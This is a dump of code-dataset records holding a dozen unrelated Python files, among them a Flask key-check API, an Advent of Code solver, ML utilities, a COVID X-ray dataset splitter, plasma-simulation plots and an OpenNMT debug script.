data_trans(args.input_path, args.output_path)\n elif args.command == 'gen_vocab':\n gen_vocab(args.input_path, args.output_path)\n elif args.command == 'filter_embedding':\n filter_embedding_nocompany(args.input_path, args.output_path)\n elif args.command == 'sample':\n sample(args.input_path, args.output_path, args.pos_num, args.neg_num)\n","sub_path":"data/data_trans.py","file_name":"data_trans.py","file_ext":"py","file_size_in_byte":4774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"434109520","text":"from flask import Flask , request , render_template , send_file\nfrom tinydb import Query , TinyDB\nimport io,json\nimport pic_email as wc\n\napp = Flask(__name__)\n# 0:KEY is not right\n# 1:KEY is right\n# 2: Make Image& Send email sucess\n# 3: Have been used\n# 4:\n# 5:Send wrong\ndef return_msg(message):\n if type(message) is dict:\n message = json.encodes(message)\n return message\n\ndef confirm_key (key): #finish\n db = TinyDB(\"data.json\")\n People = Query()\n res = db.search(People.key == key)\n if len(res) != 0:\n return res[0]\n else:\n return False\n\n\ndef confirm_use(key):#确定一下Key有没有被用过\n db = TinyDB(\"data.json\")\n People = Query()\n res = db.search(People.key == key)\n if res[0][\"use\"] == 0:\n return True\n else:\n return False\n\n@app.route('/key',methods = ['post'])\ndef key():\n message=json.loads(request.get_data(as_text=True))\n person_info = confirm_key(message['key'])\n if person_info:\n return_json = {'code': 0, 'data': person_info,\n 'message': 'success'}\n else:\n return_json = {'code': 0, 'data':'',\n 'message': 'user not in server'}\n return return_msg(person_info)\n\n\n@app.route('/send',methods = ['POST'])\ndef send_email():\n message = json.loads(request.get_data(as_text = True))\n email = message['email']\n name = message['name']\n key = message['key']\n if not confirm_key(key): # 没有每个人唯一的Key\n return \"0\" \n if confirm_use(key): # 先确定下是不是志愿者列表中的key 并且是否注册过 没问题的话开始做图片\n try:\n wc.write_to_pic(name,email)\n return return_msg(\"2\")\n except : #发送邮件或者创建图片错误 可能是邮件有问题\n return return_msg(\"5\")\n else:\n return return_msg(\"3\") # Key被用过了\n\n\n\n\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"API/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"14343003","text":"class Solution:\n def multiply(self, num1: str, num2: str) -> str:\n if num1 == '0' or num2 == '0' : return \"0\"\n l1 = list(map(int,list(num1))) # 用列表储存num1的每一数位\n l2 = list(map(int,list(num2))) # 用列表储存num2的每一数位\n \n carry2 = 1 # 帮助 num2 中乘数的进位 \n res = 0\n \n # 累加 乘数的每一位与被乘数相乘得到的结果\n while l2: \n carry1 = 1 # 帮助 num1 中被乘数的进位 \n tmp = 0 # 储存在未进位时,乘数的每一位与被乘数相乘得到的结果\n factor2 = l2.pop()\n # 将被乘数的每一位与乘数的当前位相乘,得到的结果累加,并存入tmp\n for i in range(len(l1)-1,-1,-1):\n print(i)\n tmp += l1[i]*factor2*carry1\n carry1 *= 10 # 被乘数进位\n \n res += tmp * carry2\n carry2 *= 10 # 乘数进位\n return str(res)","sub_path":"array/43.py","file_name":"43.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"598064698","text":"\nimport tensorflow as tf\nfrom tensorflow.python.keras.models import load_model\nfrom tensorflow.python.keras import backend as K\nfrom tensorflow.python.framework.graph_util import convert_variables_to_constants\nimport numpy as np\nimport json\n\ndef freeze_session(sess, keep_var_names=None, output_names=None, clear_devices=True):\n graph = sess.graph\n with graph.as_default():\n freeze_var_names = list(set(v.op.name for v in tf.global_variables()).difference(keep_var_names or []))\n output_names = output_names or []\n output_names += [v.op.name for v in tf.global_variables()]\n input_graph_def = graph.as_graph_def()\n if clear_devices:\n for node in input_graph_def.node:\n node.device = ''\n frozen_graph = convert_variables_to_constants(sess, input_graph_def, output_names, freeze_var_names)\n return frozen_graph\n\ndef convert_keras_to_tensorflow(keras_model_filename, tf_model_filename):\n model = load_model(keras_model_filename)\n model.summary()\n frozen_graph = freeze_session(K.get_session(), output_names=[out.op.name for out in model.outputs])\n tf.train.write_graph(frozen_graph, './', tf_model_filename, as_text=False)\n tf.train.write_graph(frozen_graph, './', tf_model_filename + '.txt', as_text=True)\n\nif __name__ == '__main__':\n # convert\n keras_model_filename = './model.h5'\n tf_model_filename = './frozen_graph.pb'\n convert_keras_to_tensorflow(keras_model_filename, tf_model_filename)\n","sub_path":"keras_to_tensorflow.py","file_name":"keras_to_tensorflow.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"498782887","text":"#!/usr/bin/env python3\n\nfrom GMPi_Pack import Sense\nfrom GMPi_Pack import ReadConfig\nfrom GMPi_Pack import LightAlert, ReadConfig\nimport datetime\n\nconfig = ReadConfig()\nwhichDHT = int(config[\"which_dht\"]) # default 22\nwhichDataPin = int(config[\"which_data_pin\"]) # default 4. What is the data pin?\nfilepath = config[\"output_path\"]\nsethour = datetime.datetime.now().strftime(\"%H\") #hour of day\nhour = int(sethour)\ncurrentLight = Sense(filepath, whichDHT, whichDataPin)\n\nif hour >= 12 or hour <= 20:\n maxLight = float(config[\"maximum_light_threshold\"])\n minLight = float(config[\"minimum_light_threshold\"])\n\n#for debugging\n #print(currentLight)\n #print(maxLight)\n #print(minLight)\n\n if (currentLight < minLight or currentLight > maxLight):\n LightAlert(config[\"email_sender\"], config[\"email_receiver\"])\n #print('Email Alert Sent!')\n","sub_path":"sense.py","file_name":"sense.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"378981521","text":"from copy import deepcopy\nfrom itertools import product\nfrom typing import List\n\nfrom aocd import get_data\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\n\ndef update(x: int, y: int, layout: List[str]):\n curr = layout[y][x]\n pos_y = [n + y for n in (-1, 0, 1) if 0 <= n + y < len(layout)]\n pos_x = [n + x for n in (-1, 0, 1) if 0 <= n + x < len(layout[0])]\n adjs = [(adj[0], adj[1]) for adj in product(pos_y, pos_x) if adj != (y, x)]\n\n if curr == \"L\":\n if all([layout[ny][nx] != \"#\" for ny, nx in adjs]):\n return \"#\"\n elif curr == \"#\":\n if [layout[ny][nx] == \"#\" for ny, nx in adjs].count(True) >= 4:\n return \"L\"\n return curr\n\n\ndef update2(x: int, y: int, layout: List[str]):\n adjs = []\n curr = layout[y][x]\n for yd in (-1, 0, 1):\n for xd in (-1, 0, 1):\n if yd == 0 and xd == 0:\n continue\n n = 1\n while True:\n if not (\n 0 <= y + yd * n < len(layout) and 0 <= x + xd * n < len(layout[0])\n ):\n break\n if y + yd * n >= len(layout) or x + xd * n >= len(layout[0]):\n break\n if layout[y + yd * n][x + xd * n] != \".\":\n adjs.append((y + yd * n, x + xd * n))\n break\n n += 1\n if curr == \"L\":\n if all([layout[ny][nx] != \"#\" for ny, nx in adjs]):\n return \"#\"\n elif curr == \"#\":\n if [layout[ny][nx] == \"#\" for ny, nx in adjs].count(True) >= 5:\n return \"L\"\n return curr\n\n\ndef get_occupied(layout, method):\n current = deepcopy(layout)\n next = [[\"\" for _ in range(len(layout[0]))] for _ in range(len(layout))]\n while True:\n for y, row in enumerate(current, 0):\n for x, seat in enumerate(row, 0):\n if seat == \".\":\n next[y][x] = \".\"\n else:\n if method == 1:\n next[y][x] = update(x, y, current)\n else:\n next[y][x] = update2(x, y, current)\n if current == next:\n break\n current = deepcopy(next)\n\n occupied = sum([row.count(\"#\") for row in current])\n\n print(occupied)\n\n\nif __name__ == \"__main__\":\n data = get_data(day=11, year=2020)\n get_occupied(data.splitlines(), 1)\n get_occupied(data.splitlines(), 2)","sub_path":"adventofcode/day11/generic.py","file_name":"generic.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"416108598","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Oct 20 09:50:40 2019\r\n\r\n@author: Gyanendra\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom sklearn import tree\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.utils.multiclass import unique_labels\r\n\r\n# import some data to play with\r\ndata=pd.read_csv('T3resin1.txt')\r\ndata=pd.DataFrame(data)\r\n\r\nX=data.iloc[:,2:4].values\r\n#X=pd.DataFrame(data.iloc[:,3:4])\r\nY=data.iloc[:,:1].values\r\n#Y=pd.DataFrame(data.iloc[:,:1])\r\nclass_names = np.arange(0,2,dtype=np.int)\r\nprint(class_names)\r\n\r\n# Split the data into a training set and a test set\r\n#X_train, X_test, y_train, y_test, = train_test_split(X, y, random_state=1)\r\nnumber_of_samples = len(Y)\r\n\r\n#Splitting into training, validation and test sets\r\nrandom_indices = np.random.permutation(number_of_samples)\r\n#Training set\r\nnum_training_samples = int(number_of_samples*0.7)\r\nx_train = X[random_indices[:num_training_samples]]\r\ny_train = Y[random_indices[:num_training_samples]]\r\n#Validation set\r\nnum_validation_samples = int(number_of_samples*0.15)\r\nx_val = X[random_indices[num_training_samples : num_training_samples+num_validation_samples]]\r\ny_val = Y[random_indices[num_training_samples: num_training_samples+num_validation_samples]]\r\n#Test set\r\nnum_test_samples = int(number_of_samples*0.15)\r\nx_test = X[random_indices[-num_test_samples:]]\r\ny_test = Y[random_indices[-num_test_samples:]]\r\n\r\n#Visualizing the training data\r\nX_class0 = np.asmatrix([x_train[i] for i in range(len(x_train)) if y_train[i]==0]) #Picking only the first two classes\r\nY_class0 = np.zeros((X_class0.shape[0]),dtype=np.int)\r\nX_class1 = np.asmatrix([x_train[i] for i in range(len(x_train)) if y_train[i]==1])\r\nY_class1 = np.ones((X_class1.shape[0]),dtype=np.int)\r\n\r\n\r\n# Run classifier, using a model that is too regularized (C too low) to see\r\n# the impact on the results\r\nclassifier = tree.DecisionTreeClassifier()\r\n#classifier = svm.SVC(kernel='linear', C=0.01)\r\ny_pred = classifier.fit(x_train, y_train).predict(x_test)\r\n\r\n\r\n\r\ndef plot_confusion_matrix(y_true, y_pred, classes,\r\n normalize=False,\r\n title=None,\r\n cmap=plt.cm.Blues):\r\n \"\"\"\r\n This function prints and plots the confusion matrix.\r\n Normalization can be applied by setting `normalize=True`.\r\n \"\"\"\r\n if not title:\r\n if normalize:\r\n title = 'Normalized confusion matrix'\r\n else:\r\n title = 'Confusion matrix, without normalization'\r\n\r\n # Compute confusion matrix\r\n cm = confusion_matrix(y_true, y_pred)\r\n # Only use the labels that appear in the data\r\n classes = classes[unique_labels(y_true, y_pred)]\r\n if normalize:\r\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\r\n print(\"Normalized confusion matrix\")\r\n else:\r\n print('Confusion matrix, without normalization')\r\n\r\n print(cm)\r\n\r\n fig, ax = plt.subplots()\r\n im = ax.imshow(cm, interpolation='nearest', cmap=cmap)\r\n ax.figure.colorbar(im, ax=ax)\r\n # We want to show all ticks...\r\n ax.set(xticks=np.arange(cm.shape[1]),\r\n yticks=np.arange(cm.shape[0]),\r\n # ... and label them with the respective list entries\r\n xticklabels=classes, yticklabels=classes,\r\n title=title,\r\n ylabel='True label',\r\n xlabel='Predicted label')\r\n\r\n # Rotate the tick labels and set their alignment.\r\n plt.setp(ax.get_xticklabels(), rotation=45, ha=\"right\",\r\n rotation_mode=\"anchor\")\r\n\r\n # Loop over data dimensions and create text annotations.\r\n fmt = '.2f' if normalize else 'd'\r\n thresh = cm.max() / 2.\r\n for i in range(cm.shape[0]):\r\n for j in range(cm.shape[1]):\r\n ax.text(j, i, format(cm[i, j], fmt),\r\n ha=\"center\", va=\"center\",\r\n color=\"white\" if cm[i, j] > thresh else \"black\")\r\n fig.tight_layout()\r\n return ax\r\n\r\n\r\nnp.set_printoptions(precision=2)\r\n\r\n# Plot non-normalized confusion matrix\r\nplot_confusion_matrix(y_test, y_pred, classes=class_names,\r\n title='Confusion matrix, without normalization')\r\n\r\n# Plot normalized confusion matrix\r\nplot_confusion_matrix(y_test, y_pred, classes=class_names, normalize=True,\r\n title='Normalized confusion matrix')\r\n\r\nplt.show()","sub_path":"ConfusionMatrixforDTpy.py","file_name":"ConfusionMatrixforDTpy.py","file_ext":"py","file_size_in_byte":4366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"352113466","text":"import pandas as pd\nimport os\nimport shutil\nimport random\n\n# --setting path of source dataset1 (covid-19 positive)--\ndata_path1 = \"source_datasets/covidgit/images\"\n# --reading metedata excel file inorder to extract covid positive data from source dataset--\ndataset = pd.read_csv(os.path.join(\"source_datasets/covidgit\", \"metadata.csv\"))\n# --setting destination directory for covid-19 positive data--\ntarget_dir = \"sourcedata/Covid19 Positive\"\n\n# --copying covid-19 positive images from source directory to destination directory--\ncnt = 0\nfor (i, raw) in dataset.iterrows():\n if raw['finding'] == 'Pneumonia/Viral/COVID-19' or raw['finding'] == 'Pneumonia/Viral/SARS':\n file_name = raw['filename']\n try:\n image_path = os.path.join(data_path1, file_name)\n image_copy_path = os.path.join(target_dir, file_name)\n shutil.copy2(image_path, image_copy_path)\n cnt += 1\n except Exception as e:\n i+=1\n\n# --printing total number of covid-19 positive images--\nprint(\"Total number of COVID-19 positive images\", cnt)\n\n\n# --reading metedata excel file inorder to extract covid negative data from source dataset--\nfile_path = \"Chest_xray_Corona_Metadata.csv\"\ndataset = pd.read_csv(file_path)\n# --setting path of source dataset2 (covid19 negative)--\nimages_path1 = \"source_datasets/kaggle_coronahack/train\"\nimages_path2 = \"source_datasets/kaggle_coronahack/test\"\n# --setting destination directory for covid-19 negative data--\ntarget_dir = \"sourcedata/Covid19 Negative\"\n# --copying covid-19 negative images from source directory to destination directory--\ncnt = 0\ni=0\nfor (i, raw) in dataset.iterrows():\n if raw['Label'] == \"Normal\":\n file_name = raw[\"X_ray_image_name\"]\n try:\n if raw[\"Dataset_type\"] == \"TRAIN\":\n image_path = os.path.join(images_path1, file_name)\n image_copy_path = os.path.join(target_dir, file_name)\n shutil.copy2(image_path, image_copy_path)\n elif raw[\"Dataset_type\"] == \"TEST\":\n image_path = os.path.join(images_path2, file_name)\n image_copy_path = os.path.join(target_dir, file_name)\n shutil.copy2(image_path, image_copy_path)\n cnt += 1\n except Exception as e:\n i+=1\n\n# --printing total number of covid-19 negative images--\nprint(\"Total number of COVID-19 negative images\", cnt)\n\n# --splitting covid positive images to 3 categories - train, valid, test--\nsource_dir = \"sourcedata/Covid19 Positive\"\ndestination_dir1 = \"dataset/train/Covid19 Positive\"\ndestination_dir2 = \"dataset/valid/Covid19 Positive\"\ndestination_dir3 = \"dataset/test/Covid19 Positive\"\n\nimage_names1 = os.listdir(source_dir)\nrandom.shuffle(image_names1)\nfor i in range(579):\n image_name = image_names1[i]\n image_path = os.path.join(source_dir, image_name)\n if i < 510:\n target_path = os.path.join(destination_dir1, image_name)\n shutil.copy2(image_path, target_path)\n elif i < 567:\n target_path = os.path.join(destination_dir2, image_name)\n shutil.copy2(image_path, target_path)\n else:\n target_path = os.path.join(destination_dir3, image_name)\n shutil.copy2(image_path, target_path)\n\nprint(\"The covid-19 positive images are splitted into train, valid and test sets\")\n# --splitting covid negative images to 3 categories - train, valid, test--\nsource_dir = \"sourcedata/Covid19 Negative\"\ndestination_dir1 = \"dataset/train/Covid19 Negative\"\ndestination_dir2 = \"dataset/valid/Covid19 Negative\"\ndestination_dir3 = \"dataset/test/Covid19 Negative\"\n\nimage_names1 = os.listdir(source_dir)\nrandom.shuffle(image_names1)\nfor i in range(1576):\n image_name = image_names1[i]\n image_path = os.path.join(source_dir, image_name)\n if i < 1410:\n target_path = os.path.join(destination_dir1, image_name)\n shutil.copy2(image_path, target_path)\n elif i < 1567:\n target_path = os.path.join(destination_dir2, image_name)\n shutil.copy2(image_path, target_path)\n else:\n target_path = os.path.join(destination_dir3, image_name)\n shutil.copy2(image_path, target_path)\nprint(\"The covid-19 negative images are splitted into train, valid and test sets\")","sub_path":"Creating_dataset.py","file_name":"Creating_dataset.py","file_ext":"py","file_size_in_byte":4244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"401024926","text":"from django.urls import reverse\n\nfrom tool.context_processors import categories, select_parent_template, user_profile\nfrom tool.models import Profile\nfrom tool.tests import BaseTestCase\n\n\nclass ToolContextProcessorTest(BaseTestCase):\n def test_context_processor_categories(self):\n result = categories()\n self.assertEqual(\n result,\n {\n \"tools\": [\n {\"name\": \"Canvas\", \"slug\": \"canvas\"},\n {\"name\": \"Dota draft\", \"slug\": \"dota-draft\"},\n {\"name\": \"Exif info\", \"slug\": \"exif-info\"},\n {\"name\": \"Image to base64\", \"slug\": \"image-to-base64\"},\n {\"name\": \"Text manipulation\", \"slug\": \"text-manipulation\"},\n {\"name\": \"Units converter\", \"slug\": \"units-converter\"},\n ]\n },\n )\n\n def test_context_processor_select_parent_template(self):\n resp = self.client.get(reverse(\"main\"))\n request = resp.wsgi_request\n result = select_parent_template(request)\n self.assertEqual(result, {\"parent_template\": \"base.html\"})\n\n # Ajax request.\n resp = self.client.get(reverse(\"main\"), HTTP_X_REQUESTED_WITH=\"XMLHttpRequest\")\n request = resp.wsgi_request\n result = select_parent_template(request)\n self.assertEqual(result, {\"parent_template\": \"dummy_parent.html\"})\n\n def test_context_processor_user_profile(self):\n # Anonymous user.\n resp = self.client.get(reverse(\"main\"))\n request = resp.wsgi_request\n result = user_profile(request)\n self.assertEqual(result, {\"profile\": None})\n\n # Registered user.\n self.client.login(username=\"testuser\", password=self.password)\n resp = self.client.get(reverse(\"main\"))\n request = resp.wsgi_request\n result = user_profile(request)\n profile, created = Profile.objects.get_or_create(user=self.test_user)\n self.assertEqual(created, False)\n self.assertEqual(result, {\"profile\": profile})\n","sub_path":"tool/tests/tests_context_processor.py","file_name":"tests_context_processor.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"353571892","text":"import sdf\nimport matplotlib\nmatplotlib.use('agg')\n#%matplotlib inline\nimport matplotlib.pyplot as plt\nimport numpy as np\n#from numpy import ma\nfrom matplotlib import colors, ticker, cm\nfrom matplotlib.mlab import bivariate_normal\nfrom optparse import OptionParser\nimport os\n\n\n######## Constant defined here ########\npi = 3.1415926535897932384626\nq0 = 1.602176565e-19 # C\nm0 = 9.10938291e-31 # kg\nv0 = 2.99792458e8 # m/s^2\nkb = 1.3806488e-23 # J/K\nmu0 = 4.0e-7*pi # N/A^2\nepsilon0 = 8.8541878176203899e-12 # F/m\nh_planck = 6.62606957e-34 # J s\nwavelength= 1.0e-6\nfrequency = v0*2*pi/wavelength\n\nexunit = m0*v0*frequency/q0\nbxunit = m0*frequency/q0\ndenunit = frequency**2*epsilon0*m0/q0**2\nprint('electric field unit: '+str(exunit))\nprint('magnetic field unit: '+str(bxunit))\nprint('density unit nc: '+str(denunit))\n\nfont = {'family' : 'monospace', \n 'style' : 'normal',\n 'color' : 'black', \n\t 'weight' : 'normal', \n 'size' : 20, \n } \n######### Parameter you should set ###########\nstart = 1 # start time\nstop = 49 # end time\nstep = 1 # the interval or step\n\nn=12\n\npx = np.loadtxt('./txt/px_'+str(n).zfill(4)+'sdf.txt')\npy = np.loadtxt('./txt/py_'+str(n).zfill(4)+'sdf.txt')\ngrid_x = np.loadtxt('./txt/grid_x_'+str(n).zfill(4)+'sdf.txt')\ngrid_y = np.loadtxt('./txt/grid_y_'+str(n).zfill(4)+'sdf.txt')\nwork_x = np.loadtxt('./txt/work_x_'+str(n).zfill(4)+'sdf.txt')\nwork_y = np.loadtxt('./txt/work_y_'+str(n).zfill(4)+'sdf.txt')\n\ndata = sdf.read(\"./Data/\"+str(n).zfill(4)+\".sdf\",dict=True)\nwork_x = data['Particles/Time_Integrated_Work_x/subset_high_e/electron'].data\nwork_y = data['Particles/Time_Integrated_Work_y/subset_high_e/electron'].data\n\n#choice = np.random.choice(range(px.size), 10000, replace=False)\ngamma = work_x+work_y+1\n\n\nvalue_axisx = np.linspace(7,700,50)\nvalue_axisy = np.linspace(7,700,50)\nvalue_grid = np.linspace(0,700,51)\n\nvalue_total_x = np.zeros_like(value_axisy)\nvalue_total_y = np.zeros_like(value_axisy)\nvalue_num = np.zeros_like(value_axisy)\n\nfor i in range(50):\n value_total_x[i] = np.sum(work_x[(value_grid[i]<=gamma) & (value_grid[i+1]>gamma)],0)\n value_total_y[i] = np.sum(work_y[(value_grid[i]<=gamma) & (value_grid[i+1]>gamma)],0)\n value_num[i] = np.size(work_y[(value_grid[i]<=gamma) & (value_grid[i+1]>gamma)])\n print('x-:',value_total_x[i]/(value_total_x[i]+value_total_y[i]),'; y-:',value_total_y[i]/(value_total_x[i]+value_total_y[i]))\n\n# plt.subplot()\ny_x = value_total_x/(value_total_x+value_total_y)\ny_x[y_x > 1] = 1\ny_y = 1-y_x\nwidth=10\npl=plt.bar(value_axisx, y_x*value_axisy, width, color='orangered',edgecolor='black',linewidth=2)\npt=plt.bar(value_axisx, y_y*value_axisy, width, bottom=y_x*value_axisy, color='dodgerblue',edgecolor='black',linewidth=2)\n\nplt.xlim(-10,710)\nplt.ylim(0,710)\nplt.xlabel('$\\epsilon_e$ [m$_e$c$^2$]',fontdict=font)\nplt.ylabel('Work$_{x(y)}$ [m$_e$c$^2$]',fontdict=font)\nplt.xticks(fontsize=20); plt.yticks(fontsize=20);\nplt.legend(['Work$_x$','Work$_y$'],loc='best',fontsize=18)\n#plt.text(200,650,' t=400fs',fontdict=font)\n\n#plt.show()\n#lt.figure(figsize=(100,100))\nfig = plt.gcf()\nfig.set_size_inches(10.2, 8.4)\nfig.savefig('./figure_wrap_up/work_l_t_new'+str(n).zfill(4)+'.png',format='png',dpi=160)\n#plt.close(\"all\")\n\nprint('finised '+str(round(100.0*(n-start+step)/(stop-start+step),4))+'%')\n","sub_path":"wrap_energy_work_ratio.py","file_name":"wrap_energy_work_ratio.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"584144757","text":"from units import *\n\n\nprint(\"\\n| ConvIT 1.0 |\\n\\n-- Unit Categories --\")\n\nindex = 1\n# lists out the various category options available\nfor category in UnitMeasures.keys():\n print(str(index) + \".\", category)\n index += 1\n# plus a BMI calculator\nprint(\"\\n-- Bonus --\\n5. BMI Calculator\\n\")\n\ncategory_choice = input(\"Select a category: \").capitalize() # receives input\n# for selection of a\n# category\n\n\nclass Converter:\n # handler of conversions for all units from all categories except the\n # BMI calculator\n def __init__(self, val, con_from, con_to):\n self.value = int(val)\n self.convert_from = con_from\n self.convert_to = con_to\n\n @staticmethod\n def units_listing():\n # lists out the various unit options in the selected category\n print(\"\\n-- {} Units --\".format(category_choice))\n for unit in UnitMeasures[category_choice].keys():\n print(unit)\n\n def convert(self):\n new_value = round(self.value * UnitMeasures[category_choice][self.convert_from][self.convert_to], 3)\n unit_from = SI_unit[category_choice][self.convert_from.lower()]\n unit_to = SI_unit[category_choice][self.convert_to.lower()]\n\n print(\"{}{} = {}{}\".format(self.value, unit_from, new_value, unit_to))\n\n\nif category_choice == \"BMI\".capitalize():\n BMI()\nelse:\n Converter.units_listing()\n\n value = input(\"\\nEnter value: \") # receives value to convert with\n convert_from = input(\"From: \").capitalize() # receives unit to convert from\n # as per selected category\n\n convert_to = input(\"To: \").lower() # receives unit to convert to as per\n # selected category\n\n # executes the conversion functionality and prints out the result\n Converter(value, convert_from, convert_to).convert()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"457600968","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\n\nfrom onmt.utils.logging import init_logger\nfrom onmt.utils.misc import split_corpus\n\nimport onmt.opts as opts\nfrom onmt.utils.parse import ArgumentParser\n\nfrom onmt.dynamicdata.config import read_data_config, verify_shard_config\nfrom onmt.dynamicdata.transforms import set_train_opts\nfrom onmt.dynamicdata.vocab import load_fields, load_transforms\nfrom onmt.dynamicdata.iterators import yield_debug\n\n\ndef _get_parser():\n parser = ArgumentParser(description='debug_dynamicdata.py')\n\n parser.add('-config', '--config', required=False,\n is_config_file_arg=True, help='config file path')\n parser.add('--data_config', '-data_config',\n help='Path to data config yaml file. '\n 'Turns on dynamic data loader.')\n parser.add('--transforms_from_task',\n help='Apply the same transforms as for the specified '\n 'training task.')\n parser.add('--data_type', '-data_type', default=\"text\",\n help=\"Type of the source input. Options: [text|img].\")\n parser.add('--src', '-src', default=None, help=\"Source input file\")\n parser.add('--tgt', '-tgt', default=None, help=\"Target input file\")\n parser.add('--mono', '-mono', default=None, help=\"Monolingual input file\")\n parser.add('--src_output', '-src_output', required=True, help=\"Source output file\")\n parser.add('--tgt_output', '-tgt_output', required=True, help=\"Target output file\")\n parser.add('--is_valid', '-is_valid',\n help=\"Preprocess in validation mode (instead of train)\")\n\n group = parser.add_argument_group('Logging')\n group.add('--verbose', '-verbose', action=\"store_true\",\n help='Print scores and predictions for each sentence')\n group.add('--log_file', '-log_file', type=str, default=\"\",\n help=\"Output logs to a file under this path.\")\n group.add('--log_file_level', '-log_file_level', type=str,\n action=opts.StoreLoggingLevelAction,\n choices=opts.StoreLoggingLevelAction.CHOICES,\n default=\"0\")\n\n return parser\n\n\ndef process(opt):\n logger = init_logger(opt.log_file)\n assert opt.data_config is not None\n if opt.mono is not None:\n assert all(x is None for x in (opt.src, opt.tgt))\n files = [opt.mono]\n else:\n files = [opt.src, opt.tgt]\n\n transforms_from_task = opt.transforms_from_task\n data_config = read_data_config(opt.data_config)\n verify_shard_config(data_config)\n transform_models, transforms = load_transforms(data_config)\n set_train_opts(data_config, transforms)\n fields = load_fields(data_config)\n task_transforms = transforms[transforms_from_task]\n with open(opt.src_output, 'w') as src_out, \\\n open(opt.tgt_output, 'w') as tgt_out:\n for tpl in yield_debug(files, transforms_from_task, task_transforms, is_train=not opt.is_valid):\n src, tgt, idx = tpl\n print(' '.join(src), file=src_out)\n print(' '.join(tgt), file=tgt_out)\n\n\ndef main():\n parser = _get_parser()\n\n opt = parser.parse_args()\n process(opt)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"onmt/bin/debug_dynamicdata.py","file_name":"debug_dynamicdata.py","file_ext":"py","file_size_in_byte":3212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}